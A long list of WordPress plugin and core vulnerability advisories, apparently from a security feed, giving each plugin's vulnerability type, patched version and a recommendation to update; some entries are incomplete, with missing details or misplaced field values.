Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.1.23
Recommended Action: Update to version 3.1.23, or a newer patched version

Plugin: Thumbnail carousel slider

Vulnerability: Arbitrary File Upload
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Missing Authorization to Remote Code Execution
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Stock Exporter for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Missing Authorization via multiple functions
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: New User Email Set Up

Plugin: MainWP Favorites Extension

Vulnerability: Authenticated (Subscriber+) Arbitrary Plugin Installation
Patched Version: 4.0.11
Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: Camera slideshow

Plugin: Smart Slider 3

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.0.9
Recommended Action: Update to version 3.5.0.9, or a newer patched version

Plugin: Cincopa video and media plug-in

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.137
Recommended Action: Update to version 1.137, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: PHP Object Injection
Patched Version: 1.9.36
Recommended Action: Update to version 1.9.36, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Dropdown Menu Widget

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Plugin: Vrm 360 3D Model Viewer

Vulnerability: Authenticated(Subscriber+) Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Appbox

Vulnerability: Local File Inclusion
Patched Version: 4.3.18
Recommended Action: Update to version 4.3.18, or a newer patched version

Plugin: BannerMan

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shieldon – WordPress Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Bulk Delete Users by Email

Plugin: Header Footer Code Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.24
Recommended Action: Update to version 1.1.24, or a newer patched version

Plugin: Side Cart Woocommerce | Woocommerce Cart

Vulnerability: No subtitle
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery to Account Compromise
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Multi Rating

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add SVG Support for Media Uploader | inventivo

Plugin: Simple Slideshow Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Banner Cycler

Plugin: Direct checkout, Add to cart redirect, Quick purchase button, Buy now button, Quick View button for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.49
Recommended Action: Update to version 2.1.49, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: 123ContactForm for WordPress

Vulnerability: Validation Bypass via Plugin Verification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Product Feed on WooCommerce for Google, Awin, Shareasale, Bing, and More

Vulnerability: Authenticated SQL Injection via product_id Parameter
Patched Version: 3.3.1.0
Recommended Action: Update to version 3.3.1.0, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: 2.6.10
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Getwid – Gutenberg Blocks

Vulnerability: Improper Authorization via get_remote_templates REST endpoint
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 9.2
Recommended Action: Update to version 9.2, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Missing Authorization via mvx_save_dashpages
Patched Version: 4.0.24
Recommended Action: Update to version 4.0.24, or a newer patched version

Plugin: Shop as a Customer for WooCommerce

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: LifterLMS Paypal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Authenticated(Administrator+) Directory Traversal to Arbitrary CSV File Deletion
Patched Version: 7.5.0
Recommended Action: Update to version 7.5.0, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.29
Recommended Action: Update to version 3.1.29, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Directory Traversal to Arbitrary File Deletion
Patched Version: 0.8.9.1
Recommended Action: Update to version 0.8.9.1, or a newer patched version

Plugin: FlyingPress

Vulnerability: Missing Authorization
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Unauthorised Arbitrary Post Metadata Access
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Payment Form for PayPal Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Custom Contact Forms

Vulnerability: Missing Authorization
Patched Version: 5.1.0.4
Recommended Action: Update to version 5.1.0.4, or a newer patched version

Plugin: Hide login page, Hide wp admin – stop attack on login page

Vulnerability: Login Page Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: 3com – Asesor de Cookies para normativa española

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Hardcoded Encryption Key
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Stored Cross-Site Scripting via Gallery Title
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: WP-CORS

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: Larsens Calender

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Arbitrary File Deletion
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Authenticated (Admin+) Arbitrary File Read
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Download Manager

Vulnerability: Arbitrary Asset Manager Usage
Patched Version: 3.1.23
Recommended Action: Update to version 3.1.23, or a newer patched version

Plugin: Generate Dummy Posts

Plugin: Blue Admin

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via tab and section parameter
Patched Version: 2.10.5
Recommended Action: Update to version 2.10.5, or a newer patched version

Plugin: Premmerce Redirect Manager

Vulnerability: Cross-Site Request Forgery via deleteRedirect()
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: 301 Redirect Manager <= 6.3
Patched Version: 6.4
Recommended Action: Update to version 6.4, or a newer patched version

Plugin: AI Engine

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.83
Recommended Action: Update to version 1.6.83, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Information Exposure via Arbitrary File Download
Patched Version: 5.6.5
Recommended Action: Update to version 5.6.5, or a newer patched version

Plugin: Titan Anti-spam & Security

Vulnerability: Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Add From Server

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: KN Fix Your Title

Plugin: Scroll post excerpt

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: PublishPress Capabilities Pro

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Simplr Registration Form Plus+

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 6.9.10
Recommended Action: Update to version 6.9.10, or a newer patched version

Plugin: Layer Slider

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Stored Cross-Site Scripting via Media Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Like box – Page Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: ReDi Restaurant Reservation

Vulnerability: Stored Cross-Site Scripting
Patched Version: 21.0426
Recommended Action: Update to version 21.0426, or a newer patched version

Plugin: Menu Item Visibility Control

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Activity Log Premium

Vulnerability: Missing Authorization via ajax_switch_db
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Plugin: MailCWP

Plugin: External Media without Import

Vulnerability: Authenticated (Subscriber+) Blind Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Paypal Payments

Vulnerability: Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Polls CP

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP-Planet

Plugin: Contact Form by Supsystic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.20
Recommended Action: Update to version 1.7.20, or a newer patched version

Plugin: CPO Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authentication Bypass via 2FA Setup
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Easy SVG Support

Vulnerability: Cross-Site Scripting via SVG Upload
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Missing Domain Restriction
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Open Redirect
Patched Version: 3.3.17
Recommended Action: Update to version 3.3.17, or a newer patched version

Plugin: Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration – WpRently | WordPress plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated(Author+) PHP Object Injection
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Redirection

Vulnerability: Local File Inclusion
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Path Traversal
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: GA Universal

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Variation Swatches for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_settings
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Ultimate Email Marketer

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Improper Access Control to Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Telegram Bot & Channel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Frontend Manager for WooCommerce <= 6.5.11
Patched Version: 6.5.12
Recommended Action: Update to version 6.5.12, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: MainWP File Uploader Extension

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to New Category Creation
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Slider by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

Vulnerability: Relected Cross-Site Scripting via ‘tax_name’
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WooCommerce Stripe Payment Gateway

Vulnerability: Insecure Direct Object Reference via update_payment_intent_ajax
Patched Version: 7.6.2
Recommended Action: Update to version 7.6.2, or a newer patched version

Plugin: User Blocker

Vulnerability: Authenticated (Admin+) CSV Injection
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: ULTIMATE TABLES

Plugin: Correos Oficial

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.54
Recommended Action: Update to version 2.0.54, or a newer patched version

Plugin: 404s

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Kunze Law

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.7.31
Recommended Action: Update to version 1.7.31, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: Slider Factory – Responsive Photo Slider, Image Slider, Video Slider, Carousel Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Missing Authorization
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Naver Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Maintenance Switch

Vulnerability: Cross-Site Request Forgery via ‘admin_action_request’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Cross-Site Request Forgery via Several Functions
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Drop Shadow Boxes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.27.0
Recommended Action: Update to version 1.27.0, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery leading to Cross-Site Scripting
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: HashBar – WordPress Notification Bar

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: SQL Injection
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: Pretty Url

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 13.0.8
Recommended Action: Update to version 13.0.8, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.7.9.4
Patched Version: 3.8.0.9
Recommended Action: Update to version 3.8.0.9, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via SQL Injection
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Recipe Card Blocks for Gutenberg & Elementor – Best WordPress Recipe Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Cyklodev WP Notify

Plugin: Simple Membership

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Simple Membership WP user Import

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Gettext override translations

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Authenticated(Subscriber+) Missing Authorization to Arbitrary Plugin Activation
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 6.8.0
Recommended Action: Update to version 6.8.0, or a newer patched version

Plugin: WP Word Count

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: WP-Print

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: RSVPMaker

Vulnerability: SQL Injection
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Booked – Appointment Booking for WordPress

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_order
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.16.5
Recommended Action: Update to version 1.16.5, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Remote Code Execution
Patched Version: 0.9.2.9
Recommended Action: Update to version 0.9.2.9, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated Content Injection
Patched Version: 7.6.11
Recommended Action: Update to version 7.6.11, or a newer patched version

Plugin: Paytm Payment Gateway

Vulnerability: Authenticated (Editor+) SQL Injection via ‘post’
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: WP Links Page

Vulnerability: Cross-Site Request Forgery via wplf_ajax_update_screenshots
Patched Version: 4.9.5
Recommended Action: Update to version 4.9.5, or a newer patched version

Plugin: Geo Controller

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.5.3
Recommended Action: Update to version 8.5.3, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Authentication Bypass
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: User Login History

Vulnerability: SQL Injection via OrderBy
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Legal Pages – Privacy Policy, Terms & Conditions, GDPR, CCPA, and Cookie Notice Generator

Vulnerability: Cross-Site Request Forgery via moveToTrash and fetch_and_insert_template_data
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: OOPSpam Anti-Spam

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.36
Recommended Action: Update to version 1.1.36, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.2.6
Recommended Action: Update to version 8.2.6, or a newer patched version

Plugin: Microblog Poster – Auto Publish on Social Media

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: File Upload Size Limit Bypass
Patched Version: 1.3.6.5
Recommended Action: Update to version 1.3.6.5, or a newer patched version

Plugin: Code Snippets Extended

Plugin: Stop User Enumeration

Vulnerability: Unauthenticated Username Enumeration
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.8.0.4
Patched Version: 3.8.0.9
Recommended Action: Update to version 3.8.0.9, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Missing Authorization via REST API Endpoints
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Coming Soon – Under Construction

Plugin: Church Admin

Vulnerability: Server-Side Request Forgery via church_admin_import_csv
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Zippy

Vulnerability: Missing Authorization via adminInit
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Cross-Site Scripting
Patched Version: 5.8.12
Recommended Action: Update to version 5.8.12, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Unauthenticated Information Disclosure to Protection Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Fontiran

Plugin: Payment Form for PayPal Pro

Vulnerability: SQL Injection
Patched Version: 1.1.65
Recommended Action: Update to version 1.1.65, or a newer patched version

Plugin: WP Best Quiz

Plugin: Ever Compare – Products Compare Plugin for WooCommerce

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Permalinks Customizer

Plugin: WP Meta SEO

